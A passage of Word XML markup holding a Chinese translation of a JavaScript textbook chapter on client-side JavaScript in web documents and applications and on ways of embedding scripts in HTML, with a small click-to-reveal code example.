        <w:t>当单击这个元素时，呈现剩下的内容</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>addRevealHandler(title,elt);}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>function addRevealHandler(title,elt)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>title.onclick=function(){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(elt.classNa</w:t>
      </w:r>
      <w:r>
        <w:t>me=="reveal")</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>elt.className="revealed";</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>else if(elt.className=="revealed")</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>elt.className="reveal";</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div class="reveal"</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>h1 class="handle"</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>Click Here to Reveal Hidden Text</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>/h1</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>p</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>This paragraph is hidden.It appears when you</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> click on the title.</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>/p</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>/div</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在本章的概要介绍中提到了，一些</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>页面感觉上像文档，而另一些则像应用。接下来的两节会探讨</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>在两种</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>页面类型里是如何使用的。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="304" w:name="13_1_1_WebWen_Dang_Li_De_JavaScript"/>
      <w:r>
        <w:t>13.1.1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>文档里的</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:bookmarkEnd w:id="304"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>程序可以通过</w:t>
      </w:r>
      <w:r>
        <w:t>Document</w:t>
      </w:r>
      <w:r>
        <w:t>对象和它包含的</w:t>
      </w:r>
      <w:r>
        <w:t>Element</w:t>
      </w:r>
      <w:r>
        <w:t>对象遍历和管理文档内容。它可以通过操纵</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>样式和类，修改文档内容的呈现。并且可以通过注册适当的事件处理程序来定义文档元</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>素的行为。内容、呈现和行为的组合，叫做动态</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>DHTML</w:t>
      </w:r>
      <w:r>
        <w:t>，会在第</w:t>
      </w:r>
      <w:r>
        <w:t>15</w:t>
      </w:r>
      <w:r>
        <w:t>～</w:t>
      </w:r>
      <w:r>
        <w:t>17</w:t>
      </w:r>
      <w:r>
        <w:t>章里介绍。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>文档里应当少量地使用</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>，因为</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>真正的角色是增强用户的浏览体验，使信息的获取和传递更容易。用户的体验不应依赖于</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>，但</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>可以增强体验，比如通过下面的方</w:t>
      </w:r>
      <w:r>
        <w:t>式：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>创建动画和其他视觉效果，巧妙地引导和帮助用户进行页面导航。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>对表格的列进行分组，让用户更容易找到所需要的。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>隐藏某些内容，当用户</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>深入</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>到内容里时，再逐渐展示详细信息。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="305" w:name="13_1_2_WebYing_Yong_Li_De_JavaScript"/>
      <w:r>
        <w:t>13.1.2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>应用里的</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:bookmarkEnd w:id="305"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>文档中使用的</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript DHTML</w:t>
      </w:r>
      <w:r>
        <w:t>特性在</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>应用中都会用到，对于</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>应用来说，除了内容、呈现和操作</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>之外，还依赖了</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>浏览器环境提供的更基础的服务。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>要真正理解</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>应用，需要先认识到</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>浏览器已经有了很好的发展，现在已经不仅仅是作为显示文档的工具的角色了，而渐渐变</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>成了一个简易的操作系统。想一下，传统操作系统允许组织桌面和文件夹里的图标（表示文件或应用）；</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>浏览器允许在工具栏和文件夹里组织书签（表示文档和</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>应用）。系统可以在一个窗口里运行多个应用；</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>浏览器可以在一个标签里显示多个文档。操作系统定义了很多底层网络</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>、提供绘制图像、保存文件等功能。</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>浏览器也定义底层网络</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>（第</w:t>
      </w:r>
      <w:r>
        <w:t>18</w:t>
      </w:r>
      <w:r>
        <w:t>章）、保存数据（第</w:t>
      </w:r>
      <w:r>
        <w:t>20</w:t>
      </w:r>
      <w:r>
        <w:t>章）和绘制图像（第</w:t>
      </w:r>
      <w:r>
        <w:t>21</w:t>
      </w:r>
      <w:r>
        <w:t>章）。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>谨</w:t>
      </w:r>
      <w:r>
        <w:t>记</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>浏览器是简单操作系统的概念，这样就可以把</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>应用定义为用</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>访问更多浏览器提供的高级服务</w:t>
      </w:r>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:t>比如网络、图像和数据存储</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>页面。高级服务里最有名的是</w:t>
      </w:r>
      <w:r>
        <w:t>XMLHttpRequest</w:t>
      </w:r>
      <w:r>
        <w:t>对象，后者可以对</w:t>
      </w:r>
      <w:r>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r>
        <w:t>请求编程来启用网络。</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>应用使用这个服务从服务器获取新信息，而不用重新载入页面。类似这样的</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>应用通常叫做</w:t>
      </w:r>
      <w:r>
        <w:t>Ajax</w:t>
      </w:r>
      <w:r>
        <w:t>应用，</w:t>
      </w:r>
      <w:r>
        <w:t>Ajax</w:t>
      </w:r>
      <w:r>
        <w:t>构成了</w:t>
      </w:r>
      <w:r>
        <w:t>"Web 2.0"</w:t>
      </w:r>
      <w:r>
        <w:t>的脊梁。</w:t>
      </w:r>
      <w:r>
        <w:t>XMLHttpRequest</w:t>
      </w:r>
      <w:r>
        <w:t>会在第</w:t>
      </w:r>
      <w:r>
        <w:t>18</w:t>
      </w:r>
      <w:r>
        <w:t>章详细介绍。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>HTML5</w:t>
      </w:r>
      <w:r>
        <w:t>标准（在撰写本书之时还是草案）和相关的标准为</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>应用定义</w:t>
      </w:r>
      <w:r>
        <w:t>了很多其他重要的</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>。这些</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>包括第</w:t>
      </w:r>
      <w:r>
        <w:t>21</w:t>
      </w:r>
      <w:r>
        <w:t>章和第</w:t>
      </w:r>
      <w:r>
        <w:t>20</w:t>
      </w:r>
      <w:r>
        <w:t>章的数据存储和图像</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>，以及很多其他特性的</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>，如地理位置信息、历史管理和后台线程。在实现这些</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>之后，会开启一场</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>应用功能的革命。这些</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>会在第</w:t>
      </w:r>
      <w:r>
        <w:t>22</w:t>
      </w:r>
      <w:r>
        <w:t>章中介绍。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>当然，</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>应用里会比在</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>文档里显得更加重要。</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>增强了</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>文档，但是设计良好的文档需要在禁用</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>后还能继续工作。</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>应用本质上就是</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>程序，后者使用由</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>浏览器提供的操作系统类型的服务，并且不用期望它们</w:t>
      </w:r>
      <w:r>
        <w:t>在禁用浏览器脚本后还能正常工作</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="1Text"/>
        </w:rPr>
        <w:t>[1]</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="306" w:name="13_2_Zai_HTMLLi_Qian_Ru_JavaScript"/>
      <w:r>
        <w:t>13.2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　在</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>里嵌入</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:bookmarkEnd w:id="306"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>文档里嵌入客户端</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>代码有</w:t>
      </w:r>
      <w:r>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t>种方法：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>内联，放置在＜</w:t>
      </w:r>
      <w:r>
        <w:t>script</w:t>
      </w:r>
      <w:r>
        <w:t>＞和＜</w:t>
      </w:r>
      <w:r>
        <w:t>/script</w:t>
      </w:r>
      <w:r>
        <w:t>＞标签对之间。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>放置在由＜</w:t>
      </w:r>
      <w:r>
        <w:t>script</w:t>
      </w:r>
      <w:r>
        <w:t>＞标签的</w:t>
      </w:r>
      <w:r>
        <w:t>src</w:t>
      </w:r>
      <w:r>
        <w:t>属性指定的外部文件中。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>放置在</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>事件处理程序中，该事件处理程序由</w:t>
      </w:r>
      <w:r>
        <w:t>onclick</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>onmouseover</w:t>
      </w:r>
      <w:r>
        <w:t>这样的</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>属性值指定。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>放在一个</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>里，这个</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>使用特殊的</w:t>
      </w:r>
      <w:r>
        <w:t>"javascript:"</w:t>
      </w:r>
      <w:r>
        <w:t>协议。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>接下来的小节会逐一解释这</w:t>
      </w:r>
      <w:r>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t>种</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScrip</w:t>
      </w:r>
      <w:r>
        <w:t>t</w:t>
      </w:r>
      <w:r>
        <w:t>嵌套技术。但是，值得注意的是，</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>事件处理程序属性和</w:t>
      </w:r>
      <w:r>
        <w:t>javascript:URL</w:t>
      </w:r>
      <w:r>
        <w:t>这两种方式在现代</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>代码里已经很少使用（它们在</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>早期多少有点通用）。内联脚本（没有</w:t>
      </w:r>
      <w:r>
        <w:t>src</w:t>
      </w:r>
      <w:r>
        <w:t>属性）也比它们之前用得少了。有个编程哲学叫</w:t>
      </w:r>
      <w:r>
        <w:t>"unobtrusive JavaScript"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="1Text"/>
        </w:rPr>
        <w:t>[2]</w:t>
      </w:r>
      <w:r>
        <w:t>，主张内容（</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>）和</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>行为（</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>代码）应该尽量地保持分离。根据这个编程哲学，</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>最好通过＜</w:t>
      </w:r>
      <w:r>
        <w:t>script</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素的</w:t>
      </w:r>
      <w:r>
        <w:t>src</w:t>
      </w:r>
      <w:r>
        <w:t>属性来嵌入</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>文档里。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="307" w:name="13_2_1__script_Yuan_Su_"/>
      <w:r>
        <w:t>13.2.1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　＜</w:t>
      </w:r>
      <w:r>
        <w:t>script</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素</w:t>
      </w:r>
      <w:bookmarkEnd w:id="307"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Java</w:t>
      </w:r>
      <w:r>
        <w:t>Script</w:t>
      </w:r>
      <w:r>
        <w:t>代码可以以内联的形式出现在</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>文件里的＜</w:t>
      </w:r>
      <w:r>
        <w:t>script</w:t>
      </w:r>
      <w:r>
        <w:t>＞和＜</w:t>
      </w:r>
      <w:r>
        <w:t>/script</w:t>
      </w:r>
      <w:r>
        <w:t>＞标签之间：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>script</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>这里是你的</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>代码</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在</w:t>
      </w:r>
      <w:r>
        <w:t>XHTML</w:t>
      </w:r>
      <w:r>
        <w:t>中，＜</w:t>
      </w:r>
      <w:r>
        <w:t>script</w:t>
      </w:r>
      <w:r>
        <w:t>＞标签中的内容被当做其他内容一样对待。如果</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>代码包含了</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>＆</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>字符，那么这些字符就被解释成为</w:t>
      </w:r>
      <w:r>
        <w:t>XML</w:t>
      </w:r>
      <w:r>
        <w:t>标记。因此，如果要使用</w:t>
      </w:r>
      <w:r>
        <w:t>XHTML</w:t>
      </w:r>
      <w:r>
        <w:t>，最好把所有的</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>代码放入到一个</w:t>
      </w:r>
      <w:r>
        <w:t>CDATA</w:t>
      </w:r>
      <w:r>
        <w:t>部分里：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>script</w:t>
      </w:r>
      <w:r>
        <w:t>＞＜</w:t>
      </w:r>
      <w:r>
        <w:t>![CDATA[//</w:t>
      </w:r>
      <w:r>
        <w:t>这里是你的</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>代码</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>]]</w:t>
      </w:r>
      <w:r>
        <w:t>＞＜</w:t>
      </w:r>
      <w:r>
        <w:t>/script</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>例</w:t>
      </w:r>
      <w:r>
        <w:t>13-2</w:t>
      </w:r>
      <w:r>
        <w:t>展示了一个</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>文件，它包含简单的</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>程序。注释解释了这个程序是做什么的，但这个例子主要演示的是</w:t>
      </w:r>
